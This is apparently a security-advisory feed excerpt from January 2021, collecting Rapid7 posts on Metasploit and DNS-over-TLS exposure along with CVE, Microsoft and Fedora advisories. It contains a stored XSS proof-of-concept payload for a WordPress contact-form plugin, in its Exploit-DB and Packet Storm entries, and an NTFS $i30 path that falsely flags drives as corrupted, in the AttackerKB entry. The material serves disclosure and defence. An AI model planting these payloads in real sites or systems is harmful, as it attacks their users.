6.0.25...6.0.26](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-07T10%3A58%3A16%2B00%3A00..2021-01-14T17%3A51%3A07%2B00%3A00%22>)\n * [Full diff 6.0.25...6.0.26](<https://github.com/rapid7/metasploit-framework/compare/6.0.25...6.0.26>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-01-15T20:00:13", "published": "2021-01-15T20:00:13", "id": "RAPID7BLOG:0165B62C20478239D1C1B73C779FA6F0", "href": "https://blog.rapid7.com/2021/01/15/metasploit-wrap-up-94/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T14:48:36", "bulletinFamily": "info", "cvelist": [], "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## DNS-over-TLS (DoT) (TCP/853)\n\n_Encrypting DNS is great! Unless it's baddies doing the encrypting._\n\n### TLDR\n\n * **WHAT IT IS:** [DNS over TLS](<https://tools.ietf.org/html/rfc7858>) is just what it says on the tin: the DNS protocol embedded in a TLS connection, ostensibly to make your DNS request more confidential.\n * **HOW MANY:** 3,237 discovered nodes. A hodgepodge mix of vendor/version information was discernible, but you\u2019ll need to read the details to find out more.\n * **VULNERABILITIES: **Whatever is in the DNS that backs the service or in the code that presents TLS (more often than not, a plain, ol\u2019 web server).\n * **ADVICE: **It\u2019s complicated (read on to find out why!)\n * **ALTERNATIVES: **Plain, simple, uncomplicated, and woefully unconfidential UDP DNS; [DNS over HTTPS (DoH)](<https://tools.ietf.org/html/rfc8484>); [DNS over QUIC (DoQ)](<https://tools.ietf.org/id/draft-huitema-quic-dnsoquic-06.html>); DNS over avian carriers (DoAC).\n * **GETTING:** Drunk with power. There are nearly two times as many as April 2019.\n\nAt face value, DNS over TLS (henceforth referred to as DoT) aims to be the confidentiality solution for a legacy cleartext protocol that has managed to resist numerous other confidentiality (and integrity) fixup attempts. It is one of a handful of modern efforts to help make DNS less susceptible to eavesdropping and person-in-the-middle attacks.\n\n## Discovery details\n\nWe chose to examine DoT because web browsers have become the new operating system of the internet, and DoT and cousins all allow browsers (or any app, really) to bypass your home, ISP, or organization\u2019s choices of DNS resolution method and resolution provider. Since it\u2019s presented over TLS, it can also be a great way for attackers to continue to use DNS as a command-and-control channel as well as an exfiltration channel.\n\nWe chose to examine DoT versus DoH because, well, it is far easier to enumerate DoT endpoints than it is DoH endpoints. It\u2019s getting easier to enumerate DoH since there seems to be some agreement on the standard way to query it, so that will likely make it to a future report, but for now, let\u2019s take a look at what DoT [Project Sonar](<https://www.rapid7.com/research/project-sonar/>) found:\n\n\n\nYes, you read that chart correctly! Ireland is No. 1 in terms of the number of nodes running a DoT service, and it\u2019s all thanks to a chap named [Daniel Cid](<https://en.wikipedia.org/wiki/Daniel_B._Cid>), who co-runs [CleanBrowsing](<https://cleanbrowsing.org/>), which is a \u201cDNS-based content filtering service that offers a safe way to browse the web without surprises.\u201d Daniel has his name on [AS205157](<https://bgpview.io/asn/205157>), which is allocated to Ireland, but the CleanBrowsing service itself is run out of California. In fact, CleanBrowsing comprises almost 50% of the DoT corpus (1,612 nodes), with 563 nodes attributed to the United States and a tiny number of servers attributed to a dozen or so other country network spaces.\n\nBoth the U.S. and Germany have a cornucopia of server types and autonomous systems presenting DoT services (none really stand out besides CleanBrowsing).\n\nSince Bulgaria rarely makes it into top 10 exposure lists, we took a look at what was there and it\u2019s a ton (relatively, anyway: 242) of DoT servers in [Fiber Optics Bulgaria OOD](<http://www.fobul.net/>), which is a kind of \u201cmeta\u201d service provider for ISPs. Given the relative scarcity of IPv4 addresses, setting aside 242 of them just for DoT is a pretty major investment.\n\nEven though the numbers are small, Japan\u2019s presence is interesting, as it\u2019s nearly all due to a single ISP: [Internet Initiative Japan Inc.](<https://www.iij.ad.jp/en/>)\n\n\n\nIn case you have been left unawares, [Google is a big player](<https://developers.google.com/speed/public-dns/docs/dns-over-tls>)] in the DoT space, but it tends to concentrate DNS exposure to a tiny handful of IP addresses (i.e., that bar is not Google-proper). When we filter out CleanBrowsing (yep, they\u2019re everywhere), we\u2019re left with the major exposure in Google being \u2026 a couple dozen servers running an instance of [Pi-hole](<https://pi-hole.net/>) (dnsmasq-pi-hole-2.80, to be precise). Cut/paste that finding for OV and DigitalOcean and yep, that same Pi-hole setup is tops in those two clouds as well. \n\nYou don\u2019t need to get all fancy and run a Pi-hole setup to host your own DoT server. Just fire up an nginx instance, [create a basic configuration](<https://www.nginx.com/blog/using-nginx-as-dot-doh-gateway/>), set up your own DNS behind it, and now, you too can stop your ISP from snooping your DNS queries.\n\n## Exposure information\n\nHere is where we\u2019d normally talk about versions and CVEs, etc., but the DoT situation is complicated by a few things. First, we have big players in this space using proprietary solutions, so version fingerprints such as \u201cCleanBrowsing v1.6a\u201d are not very useful information. Second, should we focus on the version of the web server or of the back-end DNS server (or, both)? The latter might not be useful, since you can configure an nginx DoT setup to proxy to a third party, and that\u2019s what will get picked up in the response. Lastly, even if we focus on the second-tier \u201cbig guns,\u201d such as [PowerDNS](<https://www.powerdns.com/>), we end up with a situation like this:\n\n\n\nGiving you that glimpse does help to show it\u2019s utter chaos even in PowerDNS-land, but DNS and chaos seem to go hand in hand.\n\n## Attacker\u2019s view\n\nThere are no DoT honeypots in [project Heisenberg](<https://www.rapid7.com/research/project-heisenberg/>), but DoT is just a TLS wrapper over a traditional DNS binary-format query. When we looked for that in the TCP/853 full packet captures, we saw us (!) and a couple other researchers. Not very exciting, but with the goal of DoT being privacy, we really shouldn\u2019t see random DoT requests.\n\nAttackers are more likely to stand up their own DoT servers or reconfigure other DoT servers to use their DNS back-ends and then use those as covert channels once they gain a foothold after a successful phishing attack. This is a big reason we enumerate/catalog DoT, and we\u2019re starting to see more DoT in residential ISP space and traditional hosting provider IP space. It looks like more folks are experimenting with DoT with each monthly study.\n\n### Our advice\n\n**IT and IT security teams** should block TCP/853, lock down DoT and DoH browser settings as much as possible so there is no way to bypass organizational IT policies, and monitor for all attempts to use DoT or DoH services internally (or externally). In other words, unless you\u2019re the ones setting them up, disallowing rogue, internal DoT is the safest course.\n\n**Cloud providers** should consider offering managed DoT solutions and provide patched, secure disk images for folks who want to stand up their own. (This is one of the few cases where organizational advice and cloud advice are quite nearly opposite.)\n\n**Government cybersecurity agencies **should monitor for malicious use of DoT and provide timely updates to the public. These centers should also be a source of unbiased, expert information on DoT, DoH, DoQ (et al).\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)", "modified": "2021-01-15T14:26:59", "published": "2021-01-15T14:26:59", "id": "RAPID7BLOG:DDFD7AA01CCC9834026B160EFFBC390A", "href": "https://blog.rapid7.com/2021/01/15/nicer-protocol-deep-dive-internet-exposure-of-dns-over-tls/", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of DNS-over-TLS", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-01-16T13:07:28", "description": "Git LFS is a command line extension for managing large files with Git. On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems. This is the result of an incomplete fix for CVE-2020-27955. This issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator. Other than avoiding untrusted repositories or using a different operating system, there is no workaround. This is fixed in v2.13.2.", "edition": 2, "cvss3": {}, "published": "2021-01-15T18:15:00", "title": "CVE-2021-21237", "type": "cve", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-21237"], "modified": "2021-01-15T19:45:00", "cpe": [], "id": "CVE-2021-21237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21237", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-01-16T13:07:28", "description": "The Junos Space Network Management Platform has been found to store shared secrets in a recoverable format that can be exposed through the UI. An attacker who is able to execute arbitrary code in the victim browser (for example via XSS) or access cached contents may be able to obtain a copy of credentials managed by Junos Space. The impact of a successful attack includes, but is not limited to, obtaining access to other servers connected to the Junos Space Management Platform. This issue affects Juniper Networks Junos Space versions prior to 20.3R1.", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 4.0}, "published": "2021-01-15T18:15:00", "title": "CVE-2021-0220", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0220"], "modified": "2021-01-15T19:45:00", "cpe": [], "id": "CVE-2021-0220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0220", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-01-16T00:40:49", "description": "An issue was discovered in flatCore before 2.0.0 build 139. A stored XSS vulnerability was identified in the prefs_smtp_psw HTTP request body parameter for the acp interface. An admin user can inject malicious client-side script into the affected parameter without any form of input sanitization. The injected payload will be executed in the browser of a user whenever one visits the affected module page.", "edition": 2, "cvss3": {}, "published": "2021-01-15T07:15:00", "title": "CVE-2021-23836", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-23836"], "modified": "2021-01-15T13:09:00", "cpe": [], "id": "CVE-2021-23836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23836", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "wired": [{"lastseen": "2021-01-15T14:37:02", "bulletinFamily": "blog", "cvelist": [], "description": "Google researchers say the campaign, which booby-trapped sites to ensnare targets, was carried out by a \u201chighly sophisticated actor.\u201d", "modified": "2021-01-15T14:00:00", "published": "2021-01-15T14:00:00", "id": "WIRED:3BEDBEEF62F623B1F0739833BB0E7E6D", "href": "https://www.wired.com/story/hackers-zero-days-infect-windows-android-devices", "type": "wired", "title": "Hackers Used Zero-Days to Infect Windows and Android Devices", "cvss": {"score": 0.0, "vector": "NONE"}}], "mscve": [{"lastseen": "2021-01-16T03:30:39", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1683"], "description": "\n", "edition": 2, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1683", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1683", "published": "2021-01-15T08:00:00", "title": "Windows Bluetooth Security Feature Bypass Vulnerability", "type": "mscve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-16T03:30:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1638"], "description": "\n", "edition": 3, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1638", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1638", "published": "2021-01-15T08:00:00", "title": "Windows Bluetooth Security Feature Bypass Vulnerability", "type": "mscve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-16T03:31:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1647"], "description": "\n", "edition": 4, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1647", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647", "published": "2021-01-15T08:00:00", "title": "Microsoft Defender Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-16T03:30:48", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1684"], "description": "\n", "edition": 2, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1684", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1684", "published": "2021-01-15T08:00:00", "title": "Windows Bluetooth Security Feature Bypass Vulnerability", "type": "mscve", "cvss": {"score": 0.0, "vector": "NONE"}}], "msrc": [{"lastseen": "2021-01-15T02:37:55", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "Microsoft addressed a Critical RCE vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. We are reminding our customers that beginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices. DC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the \u2026\n\n[ Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 Read More \u00bb](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)", "modified": "2021-01-15T02:31:56", "published": "2021-01-15T02:31:56", "id": "MSRC:5B84BD451283462DC81D4090EFE66280", "href": "https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/", "type": "msrc", "title": "Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-01-15T04:32:11", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27814", "CVE-2020-27823", "CVE-2020-27824", "CVE-2020-27841", "CVE-2020-27842", "CVE-2020-27843", "CVE-2020-27845"], "description": "MinGW Windows openjpeg2 library. ", "modified": "2021-01-15T01:21:20", "published": "2021-01-15T01:21:20", "id": "FEDORA:93A083094AEF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: mingw-openjpeg2-2.3.1-11.fc32", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "attackerkb": [{"lastseen": "2021-01-15T18:09:15", "bulletinFamily": "info", "cvelist": [], "description": "Windows 10 v1803 and later are vulnerable to NTFS file corruption when accessing a specially designed path containing the $i30 string, more specifically known as the Windows NTFS Index Attribute string as described at <https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html>.\n\nAttackers can remotely exploit this vulnerability to make Windows think a drive is corrupted even though it is not. Successfully resolving this issue will require users to reboot Windows and run a disk check on the corrupted drive, after which Windows will be convinced that the drive is no longer corrupted.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 15, 2021 6:01pm UTC reported:\n\nThere appears to be a lot of hype at the moment surrounding this vulnerability given the recent Tweets from @jonaslyk on Twitter at <https://twitter.com/jonasLyk/status/1347900440000811010> as well as the follow up article from BleepingComputer at <https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/>.\n\nWhilst this bug is made out to sound like a catastrophic disaster in Windows that could result in data loss should a user browse to a malicious file path containing the string `C:/:$i30:` followed by a file name such as `C:/:$i30:$bitmap`, the reality is that, at least in my tests, this is not the case. In fact during my tests I found the following:\n\n 1. The disk is not actually corrupted. If you try to access files on the disk, you can still interact with them and do things normally without any issues. Windows just somehow thinks that the disk is corrupted, even though it isn\u2019t. \n\n 2. Rebooting will case Windows to check the disk and try to repair it. If you skip this disk check, Windows will still think that the disk is corrupted, even though your computer will work fine. You will have to run a disk check by going to File Explorer, right clicking on the affected drive such as `C:\\`, clicking `Properties`, then the `Tools` tab, and click `Check` under the `Error Checking` section. This will then require the computer to reboot, which should be pretty quick (a few seconds in my case for a clean Windows 10 20H2 VM), after which Windows will have self corrected itself and will no longer assume the disk is corrupt. \n\n 3. You can trigger this remotely via handlers such as the `file://` handler so this could be exploited remotely by embedding a HTML link into a web page that invokes the `file://` handler on `C:/:$i30:$bitmap`. This will cause an immediate warning to display on the user\u2019s computer that the drive is corrupted, which may be enough to convince them to reboot. Alternatively the user could just continue to use the computer and ignore the warning with no side effects. \n\n\nSo in conclusion this seems more like a logic/state error bug where Windows is tricked into thinking a drive is corrupted when it is not than any real serious issue, at least from the results that I am seeing in a VM. I don\u2019t know if physical computers would be any different as I haven\u2019t tested it on a physical machine, but I do not believe there would be any reason to believe the results would be different.\n\nAssessed Attacker Value: 1 \nAssessed Attacker Value: 5\n", "modified": "2021-01-15T00:00:00", "published": "2021-01-15T00:00:00", "id": "AKB:7D2AA7FE-2311-4FBE-B5E4-130D2602F980", "href": "https://attackerkb.com/topics/PY30JMkzjw/windows-10-ntfs-i30-file-corruption", "type": "attackerkb", "title": "Windows 10 NTFS $i30 File Corruption", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-01-15T08:41:23", "description": "", "published": "2021-01-15T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Easy Contact Form 1.1.7 - &#039;Name&#039; Stored Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-15T00:00:00", "id": "EDB-ID:49427", "href": "https://www.exploit-db.com/exploits/49427", "sourceData": "# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)\r\n# Date: 14/01/2021\r\n# Exploit Author: Rahul Ramakant Singh\r\n# Vendor Homepage: https://ghozylab.com/plugins/\r\n# Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/\r\n# Version: 1.1.7\r\n# Tested on Windows\r\n\r\nSteps:\r\n\r\n1. Install WordPress 5.6\r\n2. Install and activate *Contact Form Plugin* plugin.\r\n\r\n3. Go to * Contact Form Plugin *plugin section and click on the add new form button.\r\n\r\n4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite.\r\n\r\n6. Append the JavaScript payload in the \"Email Header\" field as mentioned below\r\n\r\n*\"<sc><svg/onload=alert(454)>\"*\r\n\r\n5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49427"}], "packetstorm": [{"lastseen": "2021-01-15T17:19:39", "description": "", "published": "2021-01-15T00:00:00", "type": "packetstorm", "title": "WordPress Easy Contact Form 1.1.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-15T00:00:00", "id": "PACKETSTORM:160958", "href": "https://packetstormsecurity.com/files/160958/WordPress-Easy-Contact-Form-1.1.7-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) \n# Date: 14/01/2021 \n# Exploit Author: Rahul Ramakant Singh \n# Vendor Homepage: https://ghozylab.com/plugins/ \n# Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ \n# Version: 1.1.7 \n# Tested on Windows \n \nSteps: \n \n1. Install WordPress 5.6 \n2. Install and activate *Contact Form Plugin* plugin. \n \n3. Go to * Contact Form Plugin *plugin section and click on the add new form button. \n \n4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite. \n \n6. Append the JavaScript payload in the \"Email Header\" field as mentioned below \n \n*\"<sc><svg/onload=alert(454)>\"* \n \n5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up. \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160958/wpecf117-xss.txt"}]}